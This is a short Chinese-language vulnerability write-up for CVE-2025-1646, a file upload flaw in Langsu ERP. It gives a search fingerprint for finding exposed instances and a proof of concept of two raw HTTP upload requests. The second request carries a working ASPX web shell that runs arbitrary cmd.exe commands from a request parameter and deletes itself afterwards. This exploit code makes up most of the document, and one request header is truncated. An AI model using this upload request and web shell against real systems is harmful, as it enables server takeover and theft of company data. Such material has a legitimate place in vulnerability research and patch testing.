概述
郎速ERP CVE-2025-1646 漏洞整理
[toc]
相关参考
漏洞介绍:
郎速 ERP 是一款功能强大的企业资源计划(ERP)软件,专为中小企业量身打造,旨在帮助企业优化管理流程、提升运营效率。不仅适用于制造业,还广泛适用于零售、物流、服务等多个行业。朗速ERP后台管理系统中的FileUploadApi接口文件存在文件上传漏洞,攻击者可利用该漏洞上传恶意文件,进而控制服务器或窃取企业敏感信息。
资产指纹:
body="/Resource/Scripts/Yw/Yw_Bootstrap.js"
POC
POST /Api/TinyMce/UploadAjaxAPI.ashx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (K
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjEL
Accept: */*
Connection: close
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg
Test
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
POST /Api/FileUploadApi.ashx?method=DoWebUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Connection: close
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; name="file"; filename="1.aspx"
Content-Type: image/jpeg
<%@ Page Language="Jscript" validateRequest="false" %>
<%
var c=new System.Diagnostics.ProcessStartInfo("cmd");
var e=new System.Diagnostics.Process();
var out:System.IO.StreamReader,EI:System.IO.StreamReader;
c.UseShellExecute=false;
c.RedirectStandardOutput=true;
c.RedirectStandardError=true;
e.StartInfo=c;
c.Arguments="/c " + Request.Item["cmd"];
e.Start();
out=e.StandardOutput;
EI=e.StandardError;
e.Close();
Response.Write(out.ReadToEnd() + EI.ReadToEnd());
System.IO.File.Delete(Request.PhysicalPath);
Response.End();%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--